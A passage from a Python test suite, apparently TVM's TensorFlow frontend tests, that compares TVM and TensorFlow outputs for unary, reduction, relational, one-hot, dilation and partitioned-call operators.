"""test operator Square"""
np_data = np.random.uniform(1, 100, size=(2, 3, 5)).astype(np.float32)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(tf.float32, (2, 3, 5), name="in_data")
tf.square(in_data, name="square")
compare_tf_with_tvm([np_data], ["in_data:0"], "square:0")
def test_forward_pow_exp():
"""test Pow and Exp"""
np_in1 = np.random.uniform(-2, 2, size=(5, 7, 11)).astype(np.float32)
np_in2 = np.random.uniform(-2, 2, size=(5, 7, 11)).astype(np.float32)
tf.reset_default_graph()
with tf.Graph().as_default():
in1 = tf.placeholder(tf.float32, (5, 7, 11), name="in1")
in2 = tf.placeholder(tf.float32, (5, 7, 11), name="in2")
out1 = tf.pow(in1, in2, name="pow")
out = tf.exp(in1, name="exp")
compare_tf_with_tvm([np_in1, np_in2], ["in1:0", "in2:0"], "pow:0")
compare_tf_with_tvm([np_in1], ["in1:0"], "exp:0")
def test_forward_unary():
def _test_forward_unary(op, a_min=1, a_max=5, dtype=np.float32):
"""test unary operators"""
np_data = np.random.uniform(a_min, a_max, size=(2, 3, 5)).astype(dtype)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(dtype, (2, 3, 5), name="in_data")
out = op(in_data)
compare_tf_with_tvm([np_data], ["in_data:0"], out.name)
_test_forward_unary(tf.acos, -1, 1)
_test_forward_unary(tf.asin, -1, 1)
_test_forward_unary(tf.atanh, -1, 1)
_test_forward_unary(tf.sinh)
_test_forward_unary(tf.cosh)
_test_forward_unary(tf.acosh)
_test_forward_unary(tf.asinh)
_test_forward_unary(tf.atan)
_test_forward_unary(tf.sin)
_test_forward_unary(tf.cos)
_test_forward_unary(tf.tan)
_test_forward_unary(tf.tanh)
_test_forward_unary(tf.erf)
_test_forward_unary(tf.log)
_test_forward_unary(tf.log1p)
def test_forward_atan2():
"""test operator tan"""
tf.disable_eager_execution()
np_data_1 = np.random.uniform(1, 100, size=(2, 3, 5)).astype(np.float32)
np_data_2 = np.random.uniform(1, 100, size=(2, 3, 5)).astype(np.float32)
tf.reset_default_graph()
in_data_1 = tf.placeholder(tf.float32, (2, 3, 5), name="in_data_1")
in_data_2 = tf.placeholder(tf.float32, (2, 3, 5), name="in_data_2")
tf.atan2(in_data_1, in_data_2, name="atan2")
compare_tf_with_tvm([np_data_1, np_data_2], ["in_data_1:0", "in_data_2:0"], "atan2:0")
def test_forward_expm1():
"""test operator expm1"""
def _test_forward_expm1(shape):
tf.disable_eager_execution()
np_data = np.random.uniform(1, 10, size=shape).astype(np.float32)
tf.reset_default_graph()
in_data = tf.placeholder(tf.float32, shape, name="in_data")
tf.expm1(in_data, name="expm1")
compare_tf_with_tvm([np_data], ["in_data:0"], "expm1:0")
_test_forward_expm1([1, 100])
_test_forward_expm1([1, 10, 10])
_test_forward_expm1([2, 5, 2, 5])
def test_forward_softsign():
"""test operator softsign"""
def _test_forward_softsign(shape):
tf.disable_eager_execution()
np_data = np.random.uniform(1, 100, size=shape).astype(np.float32)
tf.reset_default_graph()
in_data = tf.placeholder(tf.float32, shape, name="in_data")
tf.nn.softsign(in_data, name="softsign")
compare_tf_with_tvm([np_data], ["in_data:0"], "softsign:0")
_test_forward_softsign([1, 100])
_test_forward_softsign([1, 10, 10])
_test_forward_softsign([2, 5, 2, 5])
def test_forward_rint():
"""test operator rint"""
def _test_forward_rint(shape):
tf.disable_eager_execution()
np_data = np.random.uniform(-100, 100, size=shape).astype(np.float32)
tf.reset_default_graph()
in_data = tf.placeholder(tf.float32, shape, name="in_data")
tf.math.rint(in_data, name="rint")
compare_tf_with_tvm([np_data], ["in_data:0"], "rint:0")
_test_forward_rint([100])
_test_forward_rint([1, 100])
_test_forward_rint([1, 10, 10])
_test_forward_rint([2, 5, 2, 5])
def test_forward_negative():
"""test tf operator Neg"""
np_data = np.random.uniform(-100, 255, size=(224, 224, 3)).astype(np.float32)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(tf.float32, (224, 224, 3), name="in_data")
tf.negative(in_data, name="negative")
compare_tf_with_tvm([np_data], ["in_data:0"], "negative:0")
def test_forward_log_softmax():
"""test operator LogSoftmax"""
np_data = np.random.uniform(1, 100, size=(9, 11)).astype(np.float32)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(tf.float32, (9, 11), name="in_data")
tf.math.log_softmax(in_data, name="LogSoftmax")
compare_tf_with_tvm([np_data], ["in_data:0"], "LogSoftmax:0")
def test_forward_softplus():
"""test operator Softplus"""
np_data = np.random.uniform(1, 10, size=(2, 3, 5)).astype(np.float32)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(tf.float32, (2, 3, 5), name="in_data")
tf.nn.softplus(in_data, name="softplus")
compare_tf_with_tvm([np_data], ["in_data:0"], "softplus:0")
def test_forward_rsqrt():
"""test Rsqrt"""
np_data = np.random.uniform(1, 100, size=(5, 7, 11)).astype(np.float32)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(tf.float32, (5, 7, 11), name="in_data")
tf.rsqrt(in_data, name="rsqrt")
compare_tf_with_tvm([np_data], ["in_data:0"], "rsqrt:0")
def test_forward_sqrt():
"""test Sqrt"""
np_data = np.random.uniform(1, 100, size=(5, 7, 11)).astype(np.float32)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(tf.float32, (5, 7, 11), name="in_data")
tf.sqrt(in_data, name="sqrt")
compare_tf_with_tvm([np_data], ["in_data:0"], "sqrt:0")
def _test_forward_right_shift(in_shape, dtype):
"""test operator RightShift"""
lh_data = np.random.randint(1, 3, size=in_shape).astype(dtype)
rh_data = np.random.randint(1, 8, size=in_shape).astype(dtype)
tf.reset_default_graph()
with tf.Graph().as_default():
lft_data = tf.placeholder(dtype, in_shape, name="lft_data")
rgt_data = tf.placeholder(dtype, in_shape, name="rgt_data")
tf.bitwise.right_shift(lft_data, rgt_data, name="RightShift")
compare_tf_with_tvm([lh_data, rh_data], ["lft_data:0", "rgt_data:0"], "RightShift:0")
def test_forward_right_shift():
_test_forward_right_shift((7,), "int32")
_test_forward_right_shift((3, 11), "int16")
def _test_forward_left_shift(in_shape, dtype):
"""test operator LeftShift"""
lh_data = np.random.randint(100, 1000000, size=in_shape).astype(dtype)
rh_data = np.random.randint(1, 3, size=in_shape).astype(dtype)
tf.reset_default_graph()
with tf.Graph().as_default():
lft_data = tf.placeholder(dtype, in_shape, name="lft_data")
rgt_data = tf.placeholder(dtype, in_shape, name="rgt_data")
tf.bitwise.left_shift(lft_data, rgt_data, name="LeftShift")
compare_tf_with_tvm([lh_data, rh_data], ["lft_data:0", "rgt_data:0"], "LeftShift:0")
def test_forward_left_shift():
_test_forward_left_shift((10,), "int32")
_test_forward_left_shift((224, 224, 3), "int16")
#######################################################################
# Mean
# ----
def test_forward_mean():
def check_mean(ishape, **kwargs):
inp_array = np.random.uniform(size=ishape).astype(np.float32)
with tf.Graph().as_default():
in1 = tf.placeholder(shape=inp_array.shape, dtype=inp_array.dtype)
tf.keras.backend.mean(in1, **kwargs)
compare_tf_with_tvm(inp_array, "Placeholder:0", "Mean:0", no_gpu=True)
check_mean((10, 8, 16, 32))
check_mean((10, 8, 16, 32), axis=(2, 3))
check_mean((10, 8, 16, 32), axis=(1, 2), keepdims=True)
#######################################################################
# Size
# ----
def test_forward_size():
def check_size(ishape):
np_input = np.random.uniform(size=ishape).astype(np.float32)
# if all dimensions are constant, TF will optimize away size operator into constant
tf_input_shape = list(np_input.shape)
tf_input_shape[0] = None
with tf.Graph().as_default():
input = tf.placeholder(shape=tf_input_shape, dtype=np_input.dtype, name="input")
tf.size(input, name="size")
compare_tf_with_tvm([np_input], ["input:0"], "size:0")
check_size((10, 8, 16, 32))
check_size((10,))
#######################################################################
# All, Any, Max, Min, Prod, variance, std, logsumexp, euclidean_norm
# ------------------------------------------------------------------
def test_forward_reduce():
def _check_op(tf_op, ishape, axis, keepdims, dtype="float32"):
tf.reset_default_graph()
if dtype == "bool":
np_data = np.random.choice([True, False], size=ishape)
else:
np_data = np.random.uniform(size=ishape).astype(dtype)
if tf_op == tf.math.reduce_prod:
axis = 1
np_data = np_data.reshape(1, -1)
with tf.Graph().as_default():
in_data = tf.placeholder(dtype, name="in_data")
reduce_op = tf_op(in_data, axis=axis, keepdims=keepdims, name="reduce_std")
compare_tf_with_tvm([np_data], ["in_data:0"], reduce_op.name)
def _test_math_op(op, dtypes=["int32", "float32"]):
for dtype in dtypes:
_check_op(op, (3, 10), axis=(-1), keepdims=False, dtype=dtype)
_check_op(op, (8, 16, 32), axis=(-1), keepdims=False, dtype=dtype)
_check_op(op, (1, 8, 8, 3), axis=(2, 3), keepdims=True, dtype=dtype)
_check_op(op, (2, 3, 10, 10), axis=(1, 2), keepdims=True, dtype=dtype)
_test_math_op(tf.math.reduce_all, dtypes=["bool"])
_test_math_op(tf.math.reduce_any, dtypes=["bool"])
_test_math_op(tf.math.reduce_max)
_test_math_op(tf.math.reduce_min)
_test_math_op(tf.math.reduce_prod)
_test_math_op(tf.math.reduce_variance, dtypes=["float32"])
_test_math_op(tf.math.reduce_std, dtypes=["float32"])
_test_math_op(tf.math.reduce_logsumexp, dtypes=["float32"])
if package_version.parse(tf.VERSION) >= package_version.parse("1.15.0"):
_test_math_op(tf.math.reduce_euclidean_norm)
#######################################################################
# All, Max, Min
# ------------------------------------------------------------------
def test_forward_raw_reduce():
def _check_op(tf_op, ishape, axis, keepdims, range_axis=False, dtype="float32"):
tf.reset_default_graph()
if dtype == "bool":
np_data = np.random.choice([True, False], size=ishape)
else:
np_data = np.random.uniform(size=ishape).astype(dtype)
if tf_op == tf.math.reduce_prod:
axis = 1
np_data = np_data.reshape(1, -1)
with tf.Graph().as_default():
if range_axis:
axis = tf.range(axis[0], axis[1], axis[2], name="range", dtype="int32")
in_data = tf.placeholder(dtype, name="in_data")
reduce_op = tf_op(input=in_data, axis=axis, keep_dims=keepdims, name="reduce_std")
compare_tf_with_tvm([np_data], ["in_data:0"], reduce_op.name)
def _test_raw_reduce_op(op, dtypes=["int32", "float32"]):
for dtype in dtypes:
_check_op(op, (3, 10), axis=(-1), keepdims=False, dtype=dtype)
_check_op(op, (8, 16, 32), axis=(-1), keepdims=False, dtype=dtype)
_check_op(op, (1, 8, 8, 3), axis=(2, 3), keepdims=True, dtype=dtype)
_check_op(op, (2, 3, 10, 10), axis=(1, 2), keepdims=True, dtype=dtype)
_check_op(op, (1, 8, 8, 3), axis=(2, 4, 1), keepdims=True, range_axis=True, dtype=dtype)
_check_op(
op, (2, 3, 10, 10), axis=(1, 3, 1), keepdims=True, range_axis=True, dtype=dtype
)
if package_version.parse(tf.VERSION) >= package_version.parse("2.4.1"):
_test_raw_reduce_op(tf.raw_ops.All, dtypes=["bool"])
_test_raw_reduce_op(tf.raw_ops.Max)
_test_raw_reduce_op(tf.raw_ops.Min)
#######################################################################
# Relational operators
# --------------------
def _test_forward_rel_op(data, func):
with tf.Graph().as_default():
in1 = tf.placeholder(shape=data[0].shape, dtype=data[0].dtype, name="in1")
in2 = tf.placeholder(shape=data[1].shape, dtype=data[1].dtype, name="in2")
op = func(in1, in2, name="op")
out = tf.cast(op, tf.int32, name="out1")
compare_tf_with_tvm([data[0], data[1]], ["in1:0", "in2:0"], "out1:0")
def test_forward_rel_ops():
t1 = np.array([[1, 2, 3], [4, 5, 6], [7, 8, 9]])
t2 = np.array([[9, 8, 7], [6, 5, 4], [3, 2, 1]])
_test_forward_rel_op([t1, t2], math_ops.less)
_test_forward_rel_op([t1, t2], math_ops.greater)
_test_forward_rel_op([t1, t2], math_ops.less_equal)
_test_forward_rel_op([t1, t2], math_ops.greater_equal)
_test_forward_rel_op([t1, t2], math_ops.equal)
_test_forward_rel_op([t1, t2], math_ops.not_equal)
#######################################################################
# ExpandDims
# ----------
def _test_forward_expand_dims(data, axis):
with tf.Graph().as_default():
in1 = tf.placeholder(shape=data.shape, dtype=data.dtype, name="in1")
out = tf.expand_dims(in1, axis)
compare_tf_with_tvm([data], [in1.name], out.name)
def test_forward_expand_dims():
_test_forward_expand_dims(np.int32(1), 0)
_test_forward_expand_dims(np.array([1]), 0)
_test_forward_expand_dims(np.array([1]), -1)
_test_forward_expand_dims(np.array([[1], [2]]), 0)
_test_forward_expand_dims(np.array([[1], [2]]), 1)
_test_forward_expand_dims(np.array([[1], [2]]), -1)
#######################################################################
# Maximum, Minimum
# ----------------
def test_forward_maximum():
"""test Op Maximum"""
def check_maximum(lh_shape, rh_shape, dtype):
tf.reset_default_graph()
lh_data = np.random.uniform(size=lh_shape).astype(dtype)
rh_data = np.random.uniform(size=rh_shape).astype(dtype)
with tf.Graph().as_default():
lft_data = tf.placeholder(dtype, name="lft_data")
rgt_data = tf.placeholder(dtype, name="rgt_data")
tf.math.maximum(lft_data, rgt_data, name="maximum")
compare_tf_with_tvm([lh_data, rh_data], ["lft_data:0", "rgt_data:0"], "maximum:0")
check_maximum((10, 8, 16, 32), (1,), dtype="int32")
check_maximum((10, 8, 16, 32), (10, 8, 16, 32), dtype="float32")
def test_forward_minimum():
"""test Op Minimum"""
def check_minimum(lh_shape, rh_shape, dtype):
tf.reset_default_graph()
lh_data = np.random.uniform(size=lh_shape).astype(dtype)
rh_data = np.random.uniform(size=rh_shape).astype(dtype)
with tf.Graph().as_default():
lft_data = tf.placeholder(dtype, name="lft_data")
rgt_data = tf.placeholder(dtype, name="rgt_data")
tf.math.minimum(lft_data, rgt_data, name="minimum")
compare_tf_with_tvm([lh_data, rh_data], ["lft_data:0", "rgt_data:0"], "minimum:0")
check_minimum((10, 8, 16, 32), (1,), dtype="int32")
check_minimum((10, 8, 16, 32), (10, 8, 16, 32), dtype="float32")
#######################################################################
# PlaceholderWithDefault
# ----------------------
def test_placeholder():
with tf.Graph().as_default():
in_data1 = np.random.uniform(-5, 5, size=(3, 4, 5)).astype(np.float32)
var1 = tf.Variable(in_data1, name="in1")
var2 = array_ops.placeholder_with_default(var1, None, name="place1")
in_data2 = np.random.uniform(-5, 5, size=(3, 4, 5)).astype(np.float32)
place1 = array_ops.placeholder(shape=in_data1.shape, dtype=in_data1.dtype, name="in2")
out1 = tf.math.add(var1, var2, name="out1")
out2 = tf.math.add(out1, place1, name="out2")
compare_tf_with_tvm(
[in_data1, in_data2], ["place1:0", "in2:0"], "out2:0", init_global_variables=True
)
#######################################################################
# OneHot
# ----------------------
def _test_forward_one_hot(indices_shape, depth, on_value, off_value, axis, out_dtype):
inp_array1 = np.random.randint(0, 5, size=indices_shape)
with tf.Graph().as_default():
in1 = tf.placeholder(shape=inp_array1.shape, dtype=inp_array1.dtype)
out = tf.one_hot(in1, depth, on_value, off_value, axis, dtype=out_dtype)
compare_tf_with_tvm(inp_array1, in1.name, out.name)
def test_forward_one_hot():
_test_forward_one_hot((3,), 3, 1, 0, -1, "int32")
_test_forward_one_hot((3,), 3, 1.0, 0.0, -1, "float32")
_test_forward_one_hot((2, 2), 5, 2, -2, 0, "int32")
_test_forward_one_hot((2, 2), 5, 0.5, -0.5, 1, "float32")
_test_forward_one_hot((3, 2, 4, 5), 6, 1, 0, 1, "int32")
_test_forward_one_hot((3, 2, 4, 5), 6, 1.0, 0.0, 0, "float32")
#######################################################################
# AddN
# ----------------------
def _test_forward_add_n(inputs):
tf.reset_default_graph()
with tf.Graph().as_default():
temp = []
for each in inputs:
temp.append(tf.placeholder(shape=each.shape, dtype=each.dtype))
output = tf.add_n(temp)
compare_tf_with_tvm([each for each in inputs], [each.name for each in temp], output.name)
def test_forward_add_n():
x = np.random.randint(1, 100, size=(3, 3, 3), dtype=np.int32)
y = np.random.randint(1, 100, size=(3, 3, 3), dtype=np.int32)
z = np.random.randint(1, 100, size=(3, 3, 3), dtype=np.int32)
m, n, o = x.astype(np.float32), y.astype(np.float32), z.astype(np.float32)
in0 = x
in1 = [x, y]
in2 = (x, y, z)
in3 = m
in4 = [m, n]
in5 = (m, n, o)
_test_forward_add_n(in0)
_test_forward_add_n(in1)
_test_forward_add_n(in2)
_test_forward_add_n(in3)
_test_forward_add_n(in4)
_test_forward_add_n(in5)
#######################################################################
# Sharing params case
# ----------------------
def test_sharing_node():
"""Test the sharing params case."""
np_data = np.random.uniform(size=(2, 2, 2)).astype("float32")
with tf.Graph().as_default():
in_data = tf.placeholder(tf.float32, shape=(2, 2, 2), name="in_data")
axis = tf.constant([-1], dtype=tf.int32, name="axis")
mean0 = tf.reduce_mean(in_data, axis=axis, keepdims=False, name="mean0")
mean1 = tf.reduce_mean(in_data, axis=axis, keepdims=False, name="mean1")
out = tf.add(mean0, mean1, name="out")
compare_tf_with_tvm([np_data], ["in_data:0"], "out:0")
#######################################################################
# Unravel Index
# ----------------------
def _test_forward_unravel_index(inputs):
tf.reset_default_graph()
with tf.Graph().as_default():
temp = []
for each in inputs:
temp.append(tf.placeholder(shape=each.shape, dtype=each.dtype))
output = tf.unravel_index(temp[0], temp[1])
compare_tf_with_tvm([each for each in inputs], [each.name for each in temp], output.name)
def _test_forward_unravel_index_scalar(x, y, dtype="int32"):
tf.reset_default_graph()
with tf.Graph().as_default():
indices_1 = constant_op.constant(x, dtype=dtype)
dims_1 = constant_op.constant(y, dtype=dtype)
out_1 = array_ops.unravel_index(indices_1, dims_1)
compare_tf_with_tvm([], [], out_1.name)
def test_forward_unravel_index():
x = np.array([0, 1, 2, 3])
y = np.array([2, 2])
_test_forward_unravel_index([x, y])
x = np.array([0, 1, 2, 5])
y = np.array([2, 3])
_test_forward_unravel_index([x, y])
x = np.array([0, 1, 2, 5])
y = np.array([6])
_test_forward_unravel_index([x, y])
x = np.array([102, 300, 16])
y = np.array([10, 10, 9, 6])
_test_forward_unravel_index([x, y])
x = np.array([100])
y = np.array([10, 10, 9, 6])
_test_forward_unravel_index([x, y])
# Test scalar input
_test_forward_unravel_index_scalar(13, [1, 4, 5, 2])
#######################################################################
# Dilation2d
# ----------------------
def _test_dilation2d(tensor_in_sizes, filter_in_sizes, strides, dilations, padding):
"""One iteration of dilation2d with given shapes and attributes"""
total_size_1 = np.prod(tensor_in_sizes)
total_size_2 = np.prod(filter_in_sizes)
# Initializes the input tensor with array containing incrementing
# numbers from 1.
data_array = [f * 1.0 for f in range(1, total_size_1 + 1)]
filter_array = [f * 1.0 for f in range(1, total_size_2 + 1)]
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=tensor_in_sizes, dtype="float32")
in_filter = constant_op.constant(filter_array, shape=filter_in_sizes, dtype="float32")
nn_ops.dilation2d(in_data, in_filter, strides=strides, rates=dilations, padding=padding)
compare_tf_with_tvm(
np.reshape(data_array, tensor_in_sizes).astype("float32"),
"Placeholder:0",
"Dilation2D:0",
no_gpu=True,
)
def test_forward_dilation():
_test_dilation2d([1, 18, 18, 32], [4, 4, 32], [1, 1, 1, 1], [1, 2, 1, 1], "VALID")
_test_dilation2d([1, 15, 15, 32], [4, 4, 32], [1, 1, 1, 1], [1, 2, 1, 1], "SAME")
_test_dilation2d([1, 5, 5, 1], [2, 2, 1], [1, 1, 1, 1], [1, 1, 1, 1], "VALID")
_test_dilation2d([1, 5, 5, 1], [3, 3, 1], [1, 1, 1, 1], [1, 2, 2, 1], "VALID")
_test_dilation2d([1, 5, 5, 3], [3, 3, 3], [1, 1, 1, 1], [1, 1, 1, 1], "SAME")
_test_dilation2d([1, 28, 28, 3], [5, 5, 3], [1, 2, 2, 1], [1, 1, 1, 1], "VALID")
_test_dilation2d([1, 224, 224, 10], [8, 8, 10], [1, 1, 1, 1], [1, 1, 1, 1], "VALID")
_test_dilation2d([1, 18, 18, 32], [4, 4, 32], [1, 1, 1, 1], [1, 2, 1, 1], "SAME")
_test_dilation2d([1, 15, 15, 32], [4, 4, 32], [1, 1, 1, 1], [1, 2, 1, 1], "VALID")
_test_dilation2d([1, 5, 5, 1], [7, 2, 1], [1, 3, 1, 1], [1, 1, 1, 1], "SAME")
_test_dilation2d([1, 5, 5, 1], [3, 4, 1], [1, 2, 1, 1], [1, 2, 2, 1], "SAME")
_test_dilation2d([1, 5, 5, 3], [3, 3, 3], [1, 1, 4, 1], [1, 1, 1, 1], "VALID")
_test_dilation2d([1, 28, 28, 3], [5, 6, 3], [1, 1, 2, 1], [1, 1, 1, 1], "SAME")
_test_dilation2d([1, 224, 224, 10], [8, 8, 10], [1, 3, 1, 1], [1, 1, 1, 1], "SAME")
_test_dilation2d([1, 3, 3, 1], [2, 2, 1], [1, 1, 1, 1], [1, 2, 2, 1], "SAME")
_test_dilation2d([1, 3, 3, 1], [2, 2, 1], [1, 1, 1, 1], [1, 1, 2, 1], "VALID")
def _test_identityn(data_np_list):
with tf.Graph().as_default():
data_tensors = []
data_tensors_name = []
for index, data_np in enumerate(data_np_list):
tensor_name = f"data_{index}"
data_tensors_name.append(tensor_name + ":0")
data_tensors.append(
tf.placeholder(shape=data_np.shape, dtype=str(data_np.dtype), name=tensor_name)
)
output = tf.identity_n(data_tensors)
output_names = [out.name for out in output]
compare_tf_with_tvm(
data_np_list,
data_tensors_name,
output_names,
)
@pytest.mark.parametrize(
"data_np_list",
[
(
[
np.array([[1, 1], [0, 3], [0, 1], [2, 0], [3, 1]], dtype=np.int64),
np.array([1, 2, 3, 4, 5], dtype=np.int64),
np.array([5, 6], dtype=np.int64),
]
),
(
[
np.array([[1, 1], [0, 3], [2, 0], [3, 1]], dtype=np.int64),
np.array([1, 2, 3, 4], dtype=np.int64),
np.array([5, 6], dtype=np.int64),
np.array([True, False, True]),
]
),
(
[
np.array([]),
np.array([[]]),
]
),
],
)
def test_forward_identityn(data_np_list):
_test_identityn(data_np_list)
#######################################################################
# infinity ops
# ------------
def _verify_infiniteness_ops(tf_op, name):
"""test operator infinity ops"""
# Only float types are allowed in Tensorflow for isfinite and isinf
# float16 is failing on cuda
tf_dtypes = ["float32", "float64"]
for tf_dtype in tf_dtypes:
shape = (8, 8)
data = np.random.uniform(size=shape).astype(tf_dtype)
data.ravel()[np.random.choice(data.size, int(data.size * 0.5), replace=False)] = np.infty
data.ravel()[np.random.choice(data.size, int(data.size * 0.5), replace=False)] = np.nan
tf.reset_default_graph()
in_data = tf.placeholder(tf_dtype, shape, name="in_data")
tf_op(in_data, name=name)
compare_tf_with_tvm([data], ["in_data:0"], "{}:0".format(name))
def test_forward_isinf():
_verify_infiniteness_ops(tf.is_inf, "isinf")
def test_forward_isfinite():
_verify_infiniteness_ops(tf.is_finite, "isfinite")
def test_forward_isnan():
_verify_infiniteness_ops(tf.is_nan, "isnan")
def _test_spop_placeholder_without_shape_info():
with tf.Graph().as_default():
@function.Defun(*[tf.int32] * 2)
def Forward(x, y):
print(x.name)
print(y.name)
b = tf.add(x, y)
return b
pl1 = tf.placeholder(tf.int32, name="pl1")
pl2 = tf.placeholder(tf.int32, name="pl2")
pl3 = tf.placeholder(tf.int32, name="pl3")
data = np.array([[-1, 1], [2, -2]], dtype=np.int32)
data2 = np.array([[-2, 3], [4, -6]], dtype=np.int32)
data3 = np.array([[-2, 3], [4, -6]], dtype=np.int32)
z1 = gen_functional_ops.StatefulPartitionedCall(args=[pl1, pl2], Tout=[tf.int32], f=Forward)
z2 = z1 + pl3
compare_tf_with_tvm(
[data, data2, data3],
["pl1:0", "pl2:0", "pl3:0"],
["StatefulPartitionedCall:0", z2.name],
mode="vm",
init_global_variables=True,
)
def _test_spop_placeholder_with_shape_and_default_value():
with tf.Graph().as_default():
data = np.ones([1], dtype=int).astype(np.int32)
dataVar = tf.Variable(data, shape=data.shape)
pl1 = array_ops.placeholder_with_default(dataVar, shape=data.shape, name="pl1")
tpl = tf.convert_to_tensor(pl1, dtype=tf.int32)
@function.Defun(*[tf.int32])
def pl_with_default(pl):
return tf.expand_dims(tf.multiply(pl, pl), 0)
z = gen_functional_ops.StatefulPartitionedCall(
args=[tpl], Tout=[tf.int32], f=pl_with_default
)
compare_tf_with_tvm(
data, ["pl1:0"], "StatefulPartitionedCall:0", mode="vm", init_global_variables=True
)
def _test_spop_placeholder_numpy_arange_feed():
with tf.Graph().as_default():
t1 = tf.placeholder(tf.int32, (3, 3, 3), "t1")
t1_data = np.arange(27, dtype=np.int32).reshape((3, 3, 3))
t2 = tf.placeholder(tf.int32, (3, 3, 3), "t2")
t2_data = np.arange(27, dtype=np.int32).reshape((3, 3, 3))
@tf.function
def add(x, y):
return tf.add(x, y, "add_t1_t2")
t3 = add(t1, t2)
compare_tf_with_tvm(
[t1_data, t2_data], ["t1:0", "t2:0"], [t3.name], mode="vm", init_global_variables=True
)
def _test_spop_placeholder_numpy_array_feed():
with tf.Graph().as_default():
t1_data = np.array([[-1, 1, 3], [2, -2, 4], [2, -3, 14]], dtype=np.int32)
t2_data = np.array([[-2, 1, 2], [12, -2, 14], [12, -3, 4]], dtype=np.int32)
t1 = tf.placeholder(tf.int32, name="t1")
t2 = tf.placeholder(tf.int32, name="t2")
@tf.function
def add(x, y):
return tf.add(x, y, "add_t1_t2")
t3 = add(t1, t2)
compare_tf_with_tvm(
[t1_data, t2_data], ["t1:0", "t2:0"], [t3.name], mode="vm", init_global_variables=True
)
def _test_spop_function_invocation_basic():
with tf.Graph().as_default():
def fun1(a):
return tf.multiply(a, a)
def fun2(b):
return tf.multiply(b, 10)
@tf.function
def fun3(x, y):
x = fun2(x)
y = fun1(y)
z = tf.add(x, y)
return z
t3 = fun3(tf.constant(10.5), tf.constant(20.4))
compare_tf_with_tvm([], [], [t3.name], mode="vm", init_global_variables=True)
def _test_spop_function_invocation_nested():
with tf.Graph().as_default():
t1 = tf.placeholder(tf.int32, (3, 3, 3), name="t1")
t1_data = np.arange(27, dtype=np.int32).reshape((3, 3, 3))
t2 = tf.placeholder(tf.int32, name="t2")
t2_data = np.arange(27, dtype=np.int32).reshape((3, 3, 3))
@tf.function
def myfunc(x, y):
return tf.add(x, y, "myfunc")
@tf.function
def myfunc2(x, y):
z = myfunc(x, y)
l = myfunc(z, y)
m = myfunc(l, z)
return tf.add(l, m, "myfunc2")
res1 = myfunc(t1, t2)
res2 = myfunc2(res1, t1)
compare_tf_with_tvm(
[t1_data, t2_data], ["t1:0", "t2:0"], [res2.name], mode="vm", init_global_variables=True
)
def _test_spop_function_invocation_no_autograph():
with tf.Graph().as_default():
@tf.function(autograph=False)
def fun1(a):
return tf.multiply(a, a)
@tf.function(autograph=False)
def fun2(b):
return tf.multiply(b, 10)
@tf.function
def fun3(x, y):
x = fun2(x)
y = fun1(y)
z = tf.add(x, y)
return z
t3 = fun3(tf.constant(10.5), tf.constant(20.4))
compare_tf_with_tvm([], [], [t3.name], mode="vm", init_global_variables=True)
def _test_spop_function_invocation_defun():
with tf.Graph().as_default():
def fun1(a):
return tf.multiply(a, a)
def fun2(b):
return tf.multiply(b, b)
@function.Defun(dtypes.float32, dtypes.float32, func_name="Fun3")
def fun3(x, y):
x = fun2(x)
y = fun1(y)
z = tf.add(x, y)
return z
op = gen_functional_ops.StatefulPartitionedCall(
args=[tf.constant(10.5), tf.constant(20.4)],
Tout=[dtypes.float32],
f=fun3,
name="SpopFnInvocation",
)
compare_tf_with_tvm([], [], "SpopFnInvocation:0", mode="vm", init_global_variables=True)
def _test_spop_arithmetic():
with tf.Graph().as_default():
@function.Defun(*[dtypes.int32] * 3)
def arithmetic(m, x, c):
z = tf.add(tf.multiply(m, x), c)
return z
m = tf.constant(10)
x = tf.constant(20)
c = tf.constant(2)
spopFn = gen_functional_ops.StatefulPartitionedCall(
args=[m, x, c], Tout=[tf.int32], f=arithmetic
)
compare_tf_with_tvm(
[], [], "StatefulPartitionedCall:0", mode="vm", init_global_variables=True
)
def _test_spop_control_flow():
with tf.Graph().as_default():
@function.Defun(*[dtypes.float32] * 2)
def Body1(x, y):
with ops.device("/job:localhost/replica:0/task:0/device:CPU:0"):
z = math_ops.multiply(x, y)
i = 0
while i < 10:
i += 1
if i == 5:
continue
z = math_ops.multiply(x, y * i)
return z
op = gen_functional_ops.StatefulPartitionedCall(
args=[constant_op.constant(32.0), constant_op.constant(100.0)],
Tout=[dtypes.float32],
f=Body1,
)
compare_tf_with_tvm(
[], [], "StatefulPartitionedCall:0", mode="vm", init_global_variables=True
)
def _test_spop_variables():
with tf.Graph().as_default():
const1 = tf.constant(10)
const2 = tf.constant(20)
var1 = tf.Variable(const1, dtype=tf.int32)
var2 = tf.Variable(const2, dtype=tf.int32)
@function.Defun(tf.int32, tf.int32)
def Forward(x, y):
return tf.multiply(x, y)
z = gen_functional_ops.StatefulPartitionedCall(
args=[var1, var2], Tout=[tf.int32], f=Forward
)
compare_tf_with_tvm(
[], [], "StatefulPartitionedCall:0", init_global_variables=True, mode="vm"
)
def _test_spop_constants():
with tf.Graph().as_default():
@function.Defun(*[dtypes.int32] * 2)
def constantsFn(x, y):
vv = tf.constant([2, 3, 4], name="vv")
z = tf.add(vv + x, y)
return z
a = tf.constant(20000, name="a")
b = tf.constant(40000, name="b")
spopFn = gen_functional_ops.StatefulPartitionedCall(
args=[a, b], Tout=[tf.int32], f=constantsFn
)
compare_tf_with_tvm(
[], [], "StatefulPartitionedCall:0", mode="vm", init_global_variables=True
)
def _test_spop_stateful():
# This test case is to test that TVM rejects any TF stateful operations
# (including Resource Variables) except StatefulPartitionedCall/PartitionedCall
# (as these two operators can still be used as container graphs to execute
# "stateless" operations internally.
tf.reset_default_graph()
with tf.Graph().as_default():
@tf.function
def FunctionWithStatefulOp_One(i):
b = tf.random.uniform(shape=[2, 4], maxval=10, dtype=tf.float32, seed=10)
y = tf.multiply(b, i)
return y
@tf.function
def FunctionWithStatefulOp(m, n):
a = tf.random.uniform(shape=[2, 4], maxval=10, dtype=tf.float32, seed=10)
x = tf.multiply(a, m)
y = FunctionWithStatefulOp_One(n)
z = tf.multiply(x, y)
return z
